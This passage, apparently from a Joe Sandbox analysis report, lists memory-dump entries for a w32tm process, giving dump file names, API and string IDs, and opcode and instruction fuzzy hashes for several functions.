                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                              • Opcode ID: d33707ef924b3ab2a6b080be230da61ba68ffea8fafc3d442fe176ce76dbe083
                                                                                                                              • Instruction ID: 35d732b942b65071cd953b34951c9599e8b0bbe1ea33b73567adc8585324b77a
                                                                                                                              • Opcode Fuzzy Hash: d33707ef924b3ab2a6b080be230da61ba68ffea8fafc3d442fe176ce76dbe083
                                                                                                                              • Instruction Fuzzy Hash: 36411036700702AFC720DE25CC81B6AFBA9FF44710F24061AF855AF780DB21E85687D8
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                              • Opcode ID: b97885cbabbf6dd94a4f6853727b4c85259d624cb17fac52ae65a7846803974b
                                                                                                                              • Instruction ID: 36ebb2e86728e60333b785e10c9f803e5601f547154c334758e7d2f0dc972b82
                                                                                                                              • Opcode Fuzzy Hash: b97885cbabbf6dd94a4f6853727b4c85259d624cb17fac52ae65a7846803974b
                                                                                                                              • Instruction Fuzzy Hash: 82317776E002199ECB60DE39CC40BEFB7A8EB54610F440597EC49E7241EB709A498B60
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634223783.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3280000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: u^$ u^$ u^$ u^$ u^
                                                                                                                              • API String ID: 0-794342075
                                                                                                                              • Opcode ID: 83497f6396812eaa66781c26f220e42ac165d80873a4551139468eceafdcb455
                                                                                                                              • Instruction ID: 7df194517e63809f019cf27c7e15a92a5f95d07d34858197fb166f358ac03372
                                                                                                                              • Opcode Fuzzy Hash: 83497f6396812eaa66781c26f220e42ac165d80873a4551139468eceafdcb455
                                                                                                                              • Instruction Fuzzy Hash: 33F0F474C0139D8FCF44EFE1A6069EFBAB4FB04240F10654AC52AA6250E37896418FD6
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-
                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction ID: dbde9ddefc5d90cd509ec321d44d3d1ede28fe989bf141c4209fc3e3cf6d3803
                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction Fuzzy Hash: 9C919474E002369BDF24DF69CCC1ABEB7A5FF84721F18461AE865EB2D0E73499428750
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $$@
                                                                                                                              • API String ID: 0-1194432280
                                                                                                                              • Opcode ID: d4175ddbff0f0c7eb270b97d75f0f7a036e5c1e4f4f42be7dc69cbffe042bf53
                                                                                                                              • Instruction ID: 42a7c198034d355b0be3cc812497b14ff64df94e93ad19674fafd24d33268205
                                                                                                                              • Opcode Fuzzy Hash: d4175ddbff0f0c7eb270b97d75f0f7a036e5c1e4f4f42be7dc69cbffe042bf53
                                                                                                                              • Instruction Fuzzy Hash: 40814D75D006699BDB21DF54CC84BEEB7B8AF08710F0445EAE919BB290D7709E80CFA4
                                                                                                                              APIs
                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0342CFBD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallFilterFunc@8
                                                                                                                              • String ID: @$@4Cw@4Cw
                                                                                                                              • API String ID: 4062629308-3101775584
                                                                                                                              • Opcode ID: b5b25aeb76a2da23b79680b116c71e79e5e1521ef4c5a2483829095dbec5041e
                                                                                                                              • Instruction ID: cfe7d112688ae3cabd8501c7d0ec43cd4c5ea226ed934d2b99b300ecdddc7980
                                                                                                                              • Opcode Fuzzy Hash: b5b25aeb76a2da23b79680b116c71e79e5e1521ef4c5a2483829095dbec5041e
                                                                                                                              • Instruction Fuzzy Hash: 17418C75D00224DEDB21DF99C880AAEBBB8FF46B14F05412BE924EF264D734D801CB69